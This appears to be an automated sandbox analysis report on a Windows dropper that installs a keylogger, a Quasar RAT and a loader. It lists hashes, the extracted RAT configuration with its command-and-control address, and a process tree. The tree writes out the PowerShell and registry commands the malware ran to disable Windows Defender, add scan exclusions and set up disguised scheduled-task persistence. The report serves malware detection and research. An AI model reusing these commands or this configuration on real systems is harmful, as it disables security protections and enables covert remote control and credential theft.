Analysis
-
max time kernel
60s -
max time network
160s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
06-12-2021 06:33
Static task
static1
Behavioral task
behavioral1
Sample
05603775ae6c66c7207556660da29de4.exe
Resource
win7-en-20211104
General
-
Target
05603775ae6c66c7207556660da29de4.exe
-
Size
13.8MB
-
MD5
05603775ae6c66c7207556660da29de4
-
SHA1
96f1bed1e99e6cd51c4973a8b586f08097009c15
-
SHA256
09ac2a0cc0277beb2b85f5d29b4531e65fb1a25e126f89b8a5ad6d0ba04ef369
-
SHA512
7aa7620eda7d2a369414abb6d94671a3b8f039d4fce6dabedcc1daba1c0f91468555512dc7827e050b61168a77a4c2f8636eb8ba4a26b399c22a88709d8c5326
Malware Config
Extracted
quasar
2.8.0.1
Driver
134.255.220.204:4782
6IzunZymIRucbMwSQj
-
encryption_key
85wBI2y5JEbQcrqb3u8l
-
install_name
Driver.exe
-
log_directory
Driver
-
reconnect_delay
1000
-
startup_key
Realtek® High Definition Audio Driver
-
subdirectory
Realtek® High Definition Audio Driver
Signatures
-
Quasar Payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\rat v6.exe family_quasar C:\Users\Admin\AppData\Roaming\rat v6.exe family_quasar C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe family_quasar C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe family_quasar -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/1772-156-0x0000027FF6E50000-0x0000027FF718B000-memory.dmp WebBrowserPassView -
Nirsoft 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1772-156-0x0000027FF6E50000-0x0000027FF718B000-memory.dmp Nirsoft -
Blocklisted process makes network request 2 IoCs
Processes:
cmd.exeflow pid process 24 820 cmd.exe 26 820 cmd.exe -
Downloads MZ/PE file
-
Executes dropped EXE 9 IoCs
Processes:
keylogger py best.exerat v6.exeloader.exeRtkBtManServ.execmd.exeDriver.exeloader.exeloader.exeloader.exepid process 2320 keylogger py best.exe 1340 rat v6.exe 1376 loader.exe 1772 RtkBtManServ.exe 820 cmd.exe 888 Driver.exe 1232 loader.exe 5044 loader.exe 3640 loader.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\loader.exe upx C:\Users\Admin\AppData\Roaming\loader.exe upx C:\Users\Admin\AppData\Roaming\loader.exe upx C:\Users\Admin\AppData\Roaming\loader.exe upx -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
Driver.exeWScript.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek® High Definition Audio Driver = "\"C:\\Windows\\SysWOW64\\Realtek® High Definition Audio Driver\\Driver.exe\"" Driver.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Realtek® High Definition Audio Driver = "C:\\Windows\\SysWOW64\\Realtek® High Definition Audio Driver\\Driver.exe" WScript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 20 ip-api.com -
Drops file in System32 directory 4 IoCs
Processes:
Driver.exerat v6.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe Driver.exe File opened for modification C:\Windows\SysWOW64\Realtek® High Definition Audio Driver Driver.exe File created C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe rat v6.exe File opened for modification C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe rat v6.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
loader.exeloader.exepid process 1376 loader.exe 3640 loader.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3968 schtasks.exe 4108 schtasks.exe -
Modifies registry class 8 IoCs
Processes:
rat v6.exeDriver.exeexplorer.exeRtkBtManServ.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell rat v6.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open rat v6.exe Set value (str) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ rat v6.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings Driver.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings RtkBtManServ.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command rat v6.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings rat v6.exe -
Processes:
loader.exeloader.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys loader.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys\2B45B1179163F067ED8504BEEA8A807724D51262 loader.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys\2B45B1179163F067ED8504BEEA8A807724D51262\Blob = 02000000000000006c0000001c000000000000000100000020000000000000000000000002000000650031003200360031003000300064002d0063003600610033002d0034003300340030002d0039003500320062002d0034003600650032006600320064006500650066003700650000000000000000002300000000000000140000002b45b1179163f067ed8504beea8a807724d51262 loader.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys loader.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys\62BBA703D900E2753BD0BDCB3DD18812B85D002B loader.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys\62BBA703D900E2753BD0BDCB3DD18812B85D002B\Blob = 02000000000000006c0000001c000000000000000100000020000000000000000000000002000000620066003100320038003700380033002d0066003800630064002d0034003900660032002d0061006500370038002d00630030006200320032006300630062006200620062006200000000000000000023000000000000001400000062bba703d900e2753bd0bdcb3dd18812b85d002b loader.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
loader.exeConhost.exepowershell.execmd.exepowershell.exeConhost.exepowershell.exepowershell.exeDriver.exeConhost.exepid process 1376 loader.exe 1376 loader.exe 1376 loader.exe 1376 loader.exe 1376 loader.exe 1376 loader.exe 1376 loader.exe 1376 loader.exe 1376 loader.exe 1376 loader.exe 1376 loader.exe 1376 loader.exe 1376 loader.exe 1376 loader.exe 3160 Conhost.exe 1688 powershell.exe 1404 cmd.exe 344 powershell.exe 344 powershell.exe 3692 Conhost.exe 3692 Conhost.exe 1644 powershell.exe 1644 powershell.exe 4184 powershell.exe 4184 powershell.exe 3160 Conhost.exe 3160 Conhost.exe 1688 powershell.exe 1688 powershell.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 4624 Conhost.exe 4624 Conhost.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe 888 Driver.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
rat v6.exepid process 1340 rat v6.exe -
Suspicious use of AdjustPrivilegeToken 38 IoCs
Processes:
rat v6.exeRtkBtManServ.exeDriver.exeConhost.exepowershell.execmd.exepowershell.exeConhost.exepowershell.exepowershell.exeConhost.exedescription pid process Token: SeDebugPrivilege 1340 rat v6.exe Token: SeBackupPrivilege 1340 rat v6.exe Token: SeSecurityPrivilege 1340 rat v6.exe Token: SeDebugPrivilege 1772 RtkBtManServ.exe Token: SeBackupPrivilege 1340 rat v6.exe Token: SeBackupPrivilege 1340 rat v6.exe Token: SeSecurityPrivilege 1340 rat v6.exe Token: SeBackupPrivilege 1340 rat v6.exe Token: SeBackupPrivilege 1340 rat v6.exe Token: SeSecurityPrivilege 1340 rat v6.exe Token: SeBackupPrivilege 1340 rat v6.exe Token: SeBackupPrivilege 1340 rat v6.exe Token: SeSecurityPrivilege 1340 rat v6.exe Token: SeBackupPrivilege 1340 rat v6.exe Token: SeBackupPrivilege 1340 rat v6.exe Token: SeSecurityPrivilege 1340 rat v6.exe Token: SeBackupPrivilege 1340 rat v6.exe Token: SeSecurityPrivilege 1340 rat v6.exe Token: SeBackupPrivilege 1340 rat v6.exe Token: SeSecurityPrivilege 1340 rat v6.exe Token: SeSecurityPrivilege 1340 rat v6.exe Token: SeBackupPrivilege 1340 rat v6.exe Token: SeBackupPrivilege 1340 rat v6.exe Token: SeSecurityPrivilege 1340 rat v6.exe Token: SeBackupPrivilege 1340 rat v6.exe Token: SeBackupPrivilege 1340 rat v6.exe Token: SeSecurityPrivilege 1340 rat v6.exe Token: SeBackupPrivilege 1340 rat v6.exe Token: SeDebugPrivilege 888 Driver.exe Token: SeDebugPrivilege 3160 Conhost.exe Token: SeDebugPrivilege 1688 powershell.exe Token: SeDebugPrivilege 1404 cmd.exe Token: SeDebugPrivilege 344 powershell.exe Token: SeDebugPrivilege 3692 Conhost.exe Token: SeDebugPrivilege 1644 powershell.exe Token: SeDebugPrivilege 4184 powershell.exe Token: SeDebugPrivilege 888 Driver.exe Token: SeDebugPrivilege 4624 Conhost.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
loader.exeDriver.exeloader.exepid process 1376 loader.exe 888 Driver.exe 3640 loader.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
05603775ae6c66c7207556660da29de4.exekeylogger py best.exerat v6.exeloader.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2532 wrote to memory of 2320 2532 05603775ae6c66c7207556660da29de4.exe keylogger py best.exe PID 2532 wrote to memory of 2320 2532 05603775ae6c66c7207556660da29de4.exe keylogger py best.exe PID 2532 wrote to memory of 2320 2532 05603775ae6c66c7207556660da29de4.exe keylogger py best.exe PID 2532 wrote to memory of 1340 2532 05603775ae6c66c7207556660da29de4.exe rat v6.exe PID 2532 wrote to memory of 1340 2532 05603775ae6c66c7207556660da29de4.exe rat v6.exe PID 2532 wrote to memory of 1340 2532 05603775ae6c66c7207556660da29de4.exe rat v6.exe PID 2532 wrote to memory of 1376 2532 05603775ae6c66c7207556660da29de4.exe loader.exe PID 2532 wrote to memory of 1376 2532 05603775ae6c66c7207556660da29de4.exe loader.exe PID 2320 wrote to memory of 1772 2320 keylogger py best.exe RtkBtManServ.exe PID 2320 wrote to memory of 1772 2320 keylogger py best.exe RtkBtManServ.exe PID 1340 wrote to memory of 3968 1340 rat v6.exe schtasks.exe PID 1340 wrote to memory of 3968 1340 rat v6.exe schtasks.exe PID 1340 wrote to memory of 3968 1340 rat v6.exe schtasks.exe PID 1376 wrote to memory of 820 1376 loader.exe cmd.exe PID 1376 wrote to memory of 820 1376 loader.exe cmd.exe PID 1340 wrote to memory of 888 1340 rat v6.exe Driver.exe PID 1340 wrote to memory of 888 1340 rat v6.exe Driver.exe PID 1340 wrote to memory of 888 1340 rat v6.exe Driver.exe PID 1340 wrote to memory of 3288 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 3288 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 3288 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 3556 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 3556 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 3556 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 1200 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 1200 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 1200 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 1808 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 1808 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 1808 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 3596 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 3596 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 3596 1340 rat v6.exe cmd.exe PID 3288 wrote to memory of 3160 3288 cmd.exe Conhost.exe PID 3288 wrote to memory of 3160 3288 cmd.exe Conhost.exe PID 3288 wrote to memory of 3160 3288 cmd.exe Conhost.exe PID 1340 wrote to memory of 1564 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 1564 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 1564 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 3656 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 3656 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 3656 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 1260 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 1260 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 1260 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 3356 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 3356 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 3356 1340 rat v6.exe cmd.exe PID 1200 wrote to memory of 1688 1200 cmd.exe powershell.exe PID 1200 wrote to memory of 1688 1200 cmd.exe powershell.exe PID 1200 wrote to memory of 1688 1200 cmd.exe powershell.exe PID 1340 wrote to memory of 956 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 956 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 956 1340 rat v6.exe cmd.exe PID 1808 wrote to memory of 1404 1808 cmd.exe cmd.exe PID 1808 wrote to memory of 1404 1808 cmd.exe cmd.exe PID 1808 wrote to memory of 1404 1808 cmd.exe cmd.exe PID 1340 wrote to memory of 1572 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 1572 1340 rat v6.exe cmd.exe PID 1340 wrote to memory of 1572 1340 rat v6.exe cmd.exe PID 3556 wrote to memory of 344 3556 cmd.exe powershell.exe PID 3556 wrote to memory of 344 3556 cmd.exe powershell.exe PID 3556 wrote to memory of 344 3556 cmd.exe powershell.exe PID 1340 wrote to memory of 2892 1340 rat v6.exe cmd.exe -
System policy modification 1 TTPs 4 IoCs
Processes:
rat v6.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\dontdisplaylastusername = "1" rat v6.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters rat v6.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System rat v6.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP rat v6.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\05603775ae6c66c7207556660da29de4.exe"C:\Users\Admin\AppData\Local\Temp\05603775ae6c66c7207556660da29de4.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\keylogger py best.exe"C:\Users\Admin\AppData\Roaming\keylogger py best.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4gbUNbdjDVoEzuwe9QI1beMhUDwpgbq9t8eYqac7ixuzdX2esxhonYoBWN9FbGupbkub/9oCF5YryYcksMtSymyriBd/PbXKARudWjYmyujJNq14nt3KQdYmw2VrgARL8=3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Users\Admin\AppData\Roaming\rat v6.exe"C:\Users\Admin\AppData\Roaming\rat v6.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Realtek® High Definition Audio Driver" /sc ONLOGON /tr "C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe"C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Realtek® High Definition Audio Driver" /sc ONLOGON /tr "C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Local\Execution.vbs4⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution2.vbs"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution5.vbs"4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\ & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Program Files\RDP Wrapper & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Program Files\RDP Wrapper4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom.exe & exit3⤵
- Suspicious use of WriteProcessMemory
-
